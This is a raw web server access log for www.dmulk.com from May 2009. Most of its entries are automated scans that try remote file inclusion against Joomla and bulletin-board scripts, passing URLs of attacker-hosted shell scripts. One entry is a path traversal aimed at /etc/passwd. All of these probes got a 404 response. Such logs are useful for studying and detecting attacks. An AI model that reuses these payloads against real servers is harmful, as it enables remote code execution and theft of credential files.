118.219.232.137 - - [05/May/2009:10:59:59 -0700] "GET /logs/access_080201.log///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:59:59 -0700] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:59:59 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:10:59:59 -0700] "GET /logs/access_080402.log///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:00:23 -0700] "GET /logs/access_080402.log%20%20///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:00:23 -0700] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:00:23 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:11:00:23 -0700] "GET /logs/access_080201.log%20%20///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.133.32.123 - - [05/May/2009:11:00:37 -0700] "GET /logs/access_080526.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:00:40 -0700] "GET /skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:00:40 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:00:40 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:00:43 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:00:43 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:00:43 -0700] "GET /skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:00:55 -0700] "GET /skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:00:55 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:00:55 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:03 -0700] "GET /skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:03 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:03 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
128.2.204.134 - - [05/May/2009:11:01:08 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "PrivacyFinder/1.1" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:09 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:09 -0700] "GET /skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:09 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:11:01:10 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:20 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:20 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:20 -0700] "GET /skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:11:01:25 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:28 -0700] "GET /skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:28 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:28 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:11:01:28 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.22.204.193 - - [05/May/2009:11:01:35 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:35 -0700] "GET /skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:35 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:35 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.70.9 - - [05/May/2009:11:01:42 -0700] "GET /logs/access_080331.log//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:50 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:50 -0700] "GET /skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:50 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
128.2.204.134 - - [05/May/2009:11:01:51 -0700] "GET / HTTP/1.1" 200 42788 "-" "PrivacyFinder/1.1" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:52 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:52 -0700] "GET /skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:01:52 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.93.90.162 - - [05/May/2009:11:01:57 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.90.162 - - [05/May/2009:11:01:57 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.90.162 - - [05/May/2009:11:01:57 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.218 - - [05/May/2009:11:01:58 -0700] "GET /logs/access_070724.log/index.php?lang=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:11:02:25 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:11:02:26 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:11:02:26 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:02:40 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:02:40 -0700] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.54.137.9 - - [05/May/2009:11:02:40 -0700] "GET /logs/access_080313.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:11:02:44 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:02:57 -0700] "GET /logs/access_071214.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:03:06 -0700] "GET /logs/access_071214.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:11:03:08 -0700] "GET /logs/access_080526.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:03:15 -0700] "GET /logs/access_071214.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [05/May/2009:11:03:20 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.229.68.219 - - [05/May/2009:11:03:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:03:22 -0700] "GET /logs/access_071214.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:03:23 -0700] "GET /logs/access_071214.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:03:23 -0700] "GET /logs/access_071214.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.93.90.162 - - [05/May/2009:11:03:25 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:03:31 -0700] "GET /logs/access_071214.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:11:03:37 -0700] "GET /logs/access_090104.log//admin/index.php?o=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:11:03:42 -0700] "GET /logs/access_080312.log//admin/index.php?o=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:11:03:58 -0700] "GET /logs/access_090119.log/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:11:03:58 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:11:03:59 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.136.154 - - [05/May/2009:11:04:00 -0700] "GET /logs/access_081223.log/index2.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.133.32.123 - - [05/May/2009:11:04:05 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:04:11 -0700] "GET /logs/access_071214.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:04:15 -0700] "GET /logs/access_071214.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:04:16 -0700] "GET /logs/access_071214.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:04:43 -0700] "GET /logs/access_080425.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:04:53 -0700] "GET /logs/access_080425.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:04:55 -0700] "GET /logs/access_080425.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.142.240 - - [05/May/2009:11:05:00 -0700] "GET /logs/access_080925.log/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.142.240 - - [05/May/2009:11:05:01 -0700] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:11:05:02 -0700] "GET /errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:11:05:02 -0700] "GET /logs/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.142.240 - - [05/May/2009:11:05:02 -0700] "GET /logs/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:11:05:02 -0700] "GET /logs/access_080817.log/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:11:05:07 -0700] "GET /logs/access_080303.log/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:05:08 -0700] "GET /logs/access_080425.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:05:15 -0700] "GET /logs/access_080425.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:05:18 -0700] "GET /logs/access_080425.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:05:20 -0700] "GET /logs/access_080425.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:05:24 -0700] "GET /logs/access_080425.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:05:29 -0700] "GET /logs/access_080425.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:05:36 -0700] "GET /logs/access_080425.log%20%20/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:11:05:44 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:11:05:45 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:11:05:53 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.154.24 - - [05/May/2009:11:05:53 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.215.123 - - [05/May/2009:11:07:00 -0700] "GET /logs/access_071215.log//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:11:07:35 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://203.128.246.107:32000/temp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.248.102.157 - - [05/May/2009:11:08:20 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
89.248.102.157 - - [05/May/2009:11:08:20 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.248.102.157 - - [05/May/2009:11:08:20 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://arclips.com/flash/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
222.122.142.240 - - [05/May/2009:11:08:21 -0700] "GET /logs/access_080925.log/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.142.240 - - [05/May/2009:11:08:22 -0700] "GET /administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.142.240 - - [05/May/2009:11:08:22 -0700] "GET /logs/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.102.157 - - [05/May/2009:11:08:23 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://arclips.com/flash/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
222.122.142.240 - - [05/May/2009:11:09:04 -0700] "GET /logs/access_080311.log/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:11:09:24 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:11:09:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:11:09:43 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.54.165.237 - - [05/May/2009:11:09:44 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:09:51 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:09:51 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:09:51 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.86.84.185 - - [05/May/2009:11:09:55 -0700] "GET /logs/access_080925.log//include/bbs.lib.inc.php?site_path=http://www.freewebtown.com/fatal2009/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.13.231.196 - - [05/May/2009:11:10:06 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.search9.net/config/proxy/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
